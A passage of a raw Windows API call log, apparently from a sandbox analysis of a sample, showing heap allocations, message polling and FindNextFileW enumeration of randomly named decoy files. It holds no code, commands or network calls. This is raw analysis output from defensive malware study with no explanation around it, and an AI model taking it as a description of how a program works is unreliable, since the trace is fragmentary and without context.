0x2e7f2f0 [0125.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0125.495] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f160 [0125.495] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f160 [0125.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0125.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0125.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f2f0 [0125.495] FindNextFileW (in: hFindFile=0xa6e800, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ae39040, ftCreationTime.dwHighDateTime=0x1d5e846, ftLastAccessTime.dwLowDateTime=0xfce5a730, ftLastAccessTime.dwHighDateTime=0x1d5e795, ftLastWriteTime.dwLowDateTime=0xfce5a730, ftLastWriteTime.dwHighDateTime=0x1d5e795, nFileSizeHigh=0x0, nFileSizeLow=0xe879, dwReserved0=0x0, dwReserved1=0x0, cFileName="i48aq9pLiKOVw_egcT3.mp3", cAlternateFileName="I48AQ9~1.MP3")) returned 1 [0125.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0125.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e980 [0125.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f2e0 [0125.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c08 [0125.495] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7ec10 [0125.497] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7eb70 [0125.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7eca0 [0125.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7ed00 [0125.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0125.497] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7ebc0 [0125.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0125.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7ebe0 [0125.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0125.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0125.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7ed30 [0125.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0125.498] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7ec60 [0125.498] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7ec50 [0125.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0125.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0125.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7ed20 [0125.498] FindNextFileW (in: hFindFile=0xa6e800, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x62c72a90, ftCreationTime.dwHighDateTime=0x1d5ef8b, ftLastAccessTime.dwLowDateTime=0x6aceb30, ftLastAccessTime.dwHighDateTime=0x1d5e849, ftLastWriteTime.dwLowDateTime=0x6aceb30, ftLastWriteTime.dwHighDateTime=0x1d5e849, nFileSizeHigh=0x0, nFileSizeLow=0x4323, dwReserved0=0x0, dwReserved1=0x0, cFileName="IqAWqPLMQZePl.doc", cAlternateFileName="IQAWQP~1.DOC")) returned 1 [0125.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0125.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e9f0 [0125.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7ec30 [0125.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a10 [0125.498] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f2e0 [0125.498] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f2e0 [0125.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f2f0 [0125.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f160 [0125.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0125.498] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f2e0 [0125.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0125.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f160 [0125.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0125.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0125.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f2f0 [0125.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e980 [0125.499] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f2e0 [0125.499] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f2e0 [0125.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0125.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0125.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f2f0 [0125.499] FindNextFileW (in: hFindFile=0xa6e800, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa83246c0, ftCreationTime.dwHighDateTime=0x1d5e4ad, ftLastAccessTime.dwLowDateTime=0xa46c6400, ftLastAccessTime.dwHighDateTime=0x1d5e640, ftLastWriteTime.dwLowDateTime=0xa46c6400, ftLastWriteTime.dwHighDateTime=0x1d5e640, nFileSizeHigh=0x0, nFileSizeLow=0x13925, dwReserved0=0x0, dwReserved1=0x0, cFileName="kjGjReTolqh2VyQZXmn2.m4a", cAlternateFileName="KJGJRE~1.M4A")) returned 1 [0125.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0125.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0125.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f2f0 [0125.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a88 [0125.499] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7ecb0 [0125.642] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7ec20 [0125.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7ed30 [0125.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7ed10 [0125.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0125.642] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7ec50 [0125.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0125.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7eba0 [0125.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0125.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0125.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7eb80 [0125.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0125.642] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7eb50 [0125.643] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7ed20 [0125.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0125.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0125.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7eca0 [0125.643] FindNextFileW (in: hFindFile=0xa6e800, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x970aab70, ftCreationTime.dwHighDateTime=0x1d5e0bc, ftLastAccessTime.dwLowDateTime=0x3a98f640, ftLastAccessTime.dwHighDateTime=0x1d5efc0, ftLastWriteTime.dwLowDateTime=0x3a98f640, ftLastWriteTime.dwHighDateTime=0x1d5efc0, nFileSizeHigh=0x0, nFileSizeLow=0x11660, dwReserved0=0x0, dwReserved1=0x0, cFileName="kMN4z.mp4", cAlternateFileName="")) returned 1 [0125.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0125.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0125.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7ec50 [0125.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ba8 [0125.643] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f2f0 [0125.643] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f2e0 [0125.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f2f0 [0125.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f160 [0125.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0125.644] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f2e0 [0125.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0125.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f2f0 [0125.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0125.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0125.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f160 [0125.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0125.644] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f2e0 [0125.644] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f2e0 [0125.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0125.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0125.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f160 [0125.644] FindNextFileW (in: hFindFile=0xa6e800, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x808ff990, ftCreationTime.dwHighDateTime=0x1d5e4f4, ftLastAccessTime.dwLowDateTime=0xa25dbf30, ftLastAccessTime.dwHighDateTime=0x1d5eae9, ftLastWriteTime.dwLowDateTime=0xa25dbf30, ftLastWriteTime.dwHighDateTime=0x1d5eae9, nFileSizeHigh=0x0, nFileSizeLow=0x1267, dwReserved0=0x0, dwReserved1=0x0, cFileName="Ljw5WYRO6Wy.mp3", cAlternateFileName="LJW5WY~1.MP3")) returned 1 [0125.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0125.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0125.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f2f0 [0125.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b48 [0125.644] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7ec80 [0125.645] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7ec50 [0125.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7eba0 [0125.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7eb70 [0125.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0125.645] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7ec40 [0125.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0125.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7ecc0 [0125.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0125.645] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.645] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.645] FindNextFileW (in: hFindFile=0xa6e800, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3ab0b4c0, ftCreationTime.dwHighDateTime=0x1d5e4cf, ftLastAccessTime.dwLowDateTime=0x78d6c600, ftLastAccessTime.dwHighDateTime=0x1d5ea8c, ftLastWriteTime.dwLowDateTime=0x78d6c600, ftLastWriteTime.dwHighDateTime=0x1d5ea8c, nFileSizeHigh=0x0, nFileSizeLow=0x11777, dwReserved0=0x0, dwReserved1=0x0, cFileName="mfyUopWTtUAprVK7.mp3", cAlternateFileName="MFYUOP~1.MP3")) returned 1 [0125.645] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.645] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.645] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.646] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.646] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.646] FindNextFileW (in: hFindFile=0xa6e800, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf4adb750, ftCreationTime.dwHighDateTime=0x1d5f10a, ftLastAccessTime.dwLowDateTime=0xaa9de740, ftLastAccessTime.dwHighDateTime=0x1d5e668, ftLastWriteTime.dwLowDateTime=0xaa9de740, ftLastWriteTime.dwHighDateTime=0x1d5e668, nFileSizeHigh=0x0, nFileSizeLow=0x106d7, dwReserved0=0x0, dwReserved1=0x0, cFileName="mpe9Fe1_ci-oIpS.flv", cAlternateFileName="MPE9FE~1.FLV")) returned 1 [0125.646] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.646] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.646] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.646] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.646] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.647] FindNextFileW (in: hFindFile=0xa6e800, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x504457d0, ftCreationTime.dwHighDateTime=0x1d5e351, ftLastAccessTime.dwLowDateTime=0xd9861f70, ftLastAccessTime.dwHighDateTime=0x1d5e86e, ftLastWriteTime.dwLowDateTime=0xd9861f70, ftLastWriteTime.dwHighDateTime=0x1d5e86e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nyB9shM95l796G3CX", cAlternateFileName="NYB9SH~1")) returned 1 [0125.647] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.647] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.647] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.647] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.647] FindNextFileW (in: hFindFile=0xa6e800, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3827380, ftCreationTime.dwHighDateTime=0x1d67c7d, ftLastAccessTime.dwLowDateTime=0xa3827380, ftLastAccessTime.dwHighDateTime=0x1d67c7d, ftLastWriteTime.dwLowDateTime=0x84361700, ftLastWriteTime.dwHighDateTime=0x1d67c7a, nFileSizeHigh=0x0, nFileSizeLow=0x44b640, dwReserved0=0x0, dwReserved1=0x0, cFileName="O4GkFtfMO8YRUkhr.exe", cAlternateFileName="O4GKFT~1.EXE")) returned 1 [0125.647] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.647] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.647] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.647] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.647] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.647] FindNextFileW (in: hFindFile=0xa6e800, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd23700b0, ftCreationTime.dwHighDateTime=0x1d5e434, ftLastAccessTime.dwLowDateTime=0x27023710, ftLastAccessTime.dwHighDateTime=0x1d5e208, ftLastWriteTime.dwLowDateTime=0x27023710, ftLastWriteTime.dwHighDateTime=0x1d5e208, nFileSizeHigh=0x0, nFileSizeLow=0x14227, dwReserved0=0x0, dwReserved1=0x0, cFileName="P52g8.bmp", cAlternateFileName="")) returned 1 [0125.647] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.647] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.647] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.647] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.647] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.647] FindNextFileW (in: hFindFile=0xa6e800, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4499b48, ftCreationTime.dwHighDateTime=0x1d67c7d, ftLastAccessTime.dwLowDateTime=0xd4499b48, ftLastAccessTime.dwHighDateTime=0x1d67c7d, ftLastWriteTime.dwLowDateTime=0xd48535dc, ftLastWriteTime.dwHighDateTime=0x1d67c7d, nFileSizeHigh=0x0, nFileSizeLow=0x1b81d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PCRepair_rkill.dll", cAlternateFileName="PCREPA~1.DLL")) returned 1 [0125.648] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.648] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.648] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.648] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.648] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.648] FindNextFileW 